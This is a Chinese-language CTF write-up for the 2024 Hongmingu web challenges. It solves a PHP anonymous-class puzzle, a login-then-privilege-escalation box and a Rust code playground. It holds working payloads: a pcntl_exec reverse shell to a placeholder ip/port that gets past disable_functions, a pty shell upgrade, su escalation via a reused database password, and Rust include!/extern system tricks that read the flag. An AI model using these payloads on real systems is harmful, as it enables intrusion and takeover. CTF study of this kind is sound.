2024红明谷 web部分wp

WEB

ezphezph

考点：

php侧信道攻击

参考文章：https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle

项目地址：https://github.com/synacktiv/php_filter_chains_oracle_exploit

sb的是不同环境下可能爆不出来看脸

题目环境下爆破出来源码

并且根据题目介绍说是php8.3.2

<?php
if (isset($_GET['ezphpPhp8'])) {
    highlight_file(__FILE__);
} else {
    die("No");
}
$a = new class {
    function __construct()
    {
    }

    function getflag()
    {
        system('cat /flag');
    }
};
unset($a);
$a = $_GET['ezphpPhp8'];
$f = new $a();
$f->getflag();
?>

这里涉及到匿名类的名称知识点

我们需要获取到它的匿名类名称

1
2
3

$obj=new class{};
// class名为: 'class@anonymous'+chr(0)+php文件路径+行数$列数
echo get_class($obj);

自己本地开个环境然后用get_class函数获取一下类名即可不过这里需要开环境一次打通不然后面的列数需要爆破一下然后编码打入即可

1	class%40anonymous%00%2Fvar%2Fwww%2Fhtml%2Fflag.php%3A7%240

或者像大头师傅一样直接去看php官网的changelog（学到了

参考：

https://hi-arkin.com/archives/php-anonymous-stdClass.html

https://www.php.net/manual/zh/language.oop5.anonymous.php

https://www.php.net/ChangeLog-8.php#8.3.4

unauth

可惜了最后差点就出了没get到。。

www.zip找到

admin/2e525e29e465f45d8d7c56319fe73036登录进入

flag在根目录下，可能无权限直接读取。environ也读不到

网站目录下存在config.inc.php

<?php

# If you are having problems connecting to the MySQL database and all of the variables below are correct
# try changing the 'db_server' variable from localhost to 127.0.0.1. Fixes a problem due to sockets.
#   Thanks to @digininja for the fix.

# Database management system to use
$DBMS = 'MySQL';
#$DBMS = 'PGSQL'; // Currently disabled

# Database variables
#   WARNING: The database specified under db_database WILL BE ENTIRELY DELETED during setup.
#   Please use a database dedicated to DVWA.
#
# If you are using MariaDB then you cannot use root, you must use create a dedicated DVWA user.
#   See README.md for more information on this.
$_DVWA = array();
$_DVWA[ 'db_server' ]   = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ]     = 'root';
$_DVWA[ 'db_password' ] = 'b90e0086d8b1165403de6974c4167165';

# Only used with PostgreSQL/PGSQL database selection.
$_DVWA[ 'db_port '] = '5432';

# ReCAPTCHA settings
#   Used for the 'Insecure CAPTCHA' module
#   You'll need to generate your own keys at: https://www.google.com/recaptcha/admin
$_DVWA[ 'recaptcha_public_key' ]  = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';

# Default security level
#   Default value for the secuirty level with each session.
#   The default is 'impossible'. You may wish to set this to either 'low', 'medium', 'high' or impossible'.
$_DVWA[ 'default_security_level' ] = 'impossible';

# Default PHPIDS status
#   PHPIDS status with each session.
#   The default is 'disabled'. You can set this to be either 'enabled' or 'disabled'.
$_DVWA[ 'default_phpids_level' ] = 'disabled';

# Verbose PHPIDS messages
#   Enabling this will show why the WAF blocked the request on the blocked request.
#   The default is 'disabled'. You can set this to be either 'true' or 'false'.
$_DVWA[ 'default_phpids_verbose' ] = 'false';

?>

highlight_file没有被ban 看看配置文件查看一下disable_function

1
2
3

# highlight_file("/usr/local/etc/php/php.ini");

disable_functions = eval,assert,fwrite,file_put_contents,phpinfo,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,lin,putenv,mail,chroot,chgrp,dl,readlink

还有pcntl_exec()没有被ban 这种命令执行方式学到了

1	pcntl_exec("/bin/bash",array("-c","bash -i >& /dev/tcp/ip/port 0>&1"),array());

进入之后需要提权

su提权之前那个config.inc.php文件里面的数据库账户的密码竟然是admin的密码（。。。是真难绷

需要用python虚拟化一个终端出来来自：https://www.freebuf.com/articles/system/362070.html

1	python -c '__import__("pty").spawn("/bin/bash")'

之后su即可

playground

rust代码

#[post("/rust_code", data = "<code>")]
fn run_rust_code(code: String) -> String{
    if code.contains("std") {
        return "Error: std is not allowed".to_string();
    }
    //generate a random 5 length file name
    let file_name = rand::thread_rng()
        .sample_iter(&rand::distributions::Alphanumeric)
        .take(5)
        .map(char::from)
        .collect::<String>();
    if let Ok(mut file) = File::create(format!("playground/{}.rs", &file_name)) {
        file.write_all(code.as_bytes());
    }
    if let Ok(build_output) = Command::new("rustc")
        .arg(format!("playground/{}.rs",&file_name))
        .arg("-C")
        .arg("debuginfo=0")
        .arg("-C")
        .arg("opt-level=3")
        .arg("-o")
        .arg(format!("playground/{}",&file_name))
        .output() {
        if !build_output.status.success(){
            fs::remove_file(format!("playground/{}.rs",&file_name));
            return String::from_utf8_lossy(build_output.stderr.as_slice()).to_string();
        }
    }
    fs::remove_file(format!("playground/{}.rs",&file_name));
    if let Ok(output) = Command::new(format!("playground/{}",&file_name))
        .output() {
        if !output.status.success(){
            fs::remove_file(format!("playground/{}",&file_name));
            return String::from_utf8_lossy(output.stderr.as_slice()).to_string();
        } else{
            fs::remove_file(format!("playground/{}",&file_name));
            return String::from_utf8_lossy(output.stdout.as_slice()).to_string();
        }
    }
    return String::default();
 
}

方式一

/rust_code传入的date都会被编译根据大头师傅wp是编译报错包含读flag

POST /rust_code HTTP/1.1
Host: eci-2ze7qox8oygjcap3uy31.cloudeci1.ichunqiu.com:8000
Content-Length: 17
Content-Type: application/x-www-form-urlencoded

include!("/flag")

咱也不懂rust

方式二

vn的ph0师傅做的

rust无std库读文件

rust调用C库就能执行c语言代码了，调system即可

1
2
3

extern "C"{
fn system(command: *const i8);
}

不是很懂rust

这里还有一篇师傅的wp也挺细的：https://blog.csdn.net/uuzeray/article/details/137348209

Simp1escape

说是302跳转结合Thymeleaf SSTI

结尾

和高数对线之余空出时间和VN师傅一起做的，很不错的一次体验，很喜欢这种一起做题的感觉！